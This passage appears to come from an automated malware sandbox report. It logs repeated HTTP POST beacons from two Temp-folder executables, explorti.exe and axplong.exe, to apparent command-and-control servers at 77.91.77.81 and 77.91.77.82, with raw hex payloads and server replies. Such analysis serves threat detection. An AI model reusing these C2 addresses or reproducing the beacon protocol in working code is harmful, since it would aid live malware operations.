                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:54.162657022 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:54 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        84192.168.2.64992577.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:54.273832083 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:54.989408016 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:54 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:54.990221977 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:55.221065998 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:55 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        85192.168.2.64992677.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:54.490458012 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:55.189974070 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:55 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:55.195348024 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:55.415046930 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:55 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        86192.168.2.64992777.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:55.330708981 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:56.032829046 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:55 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:56.034138918 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:56.259211063 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:56 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        87192.168.2.64992877.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:55.528778076 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:56.243077040 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:56 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:56.244191885 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:56.648705006 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:56 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        88192.168.2.64992977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:56.383578062 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:57.068705082 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:56 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:57.069447994 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:57.287043095 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:57 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        89192.168.2.64993077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:56.783576012 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:57.495157957 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:57 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:57.495959997 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:57.721934080 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:57 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        90192.168.2.64993177.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:57.402122974 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:58.119369030 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:58 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:58.123563051 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:58.347516060 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:58 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        91192.168.2.64993377.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:57.842535019 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:58.546367884 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:58 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:58.547658920 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:58.767801046 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:58 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        92192.168.2.64993477.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:58.465796947 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:59.194188118 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:59 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:59.197529078 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:59.428177118 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:59 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        93192.168.2.64993577.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:58.890454054 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:59.598457098 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:59 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:59.599178076 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:59.823059082 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:59 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        94192.168.2.64993677.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:59.538897038 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:00.244607925 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:00 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
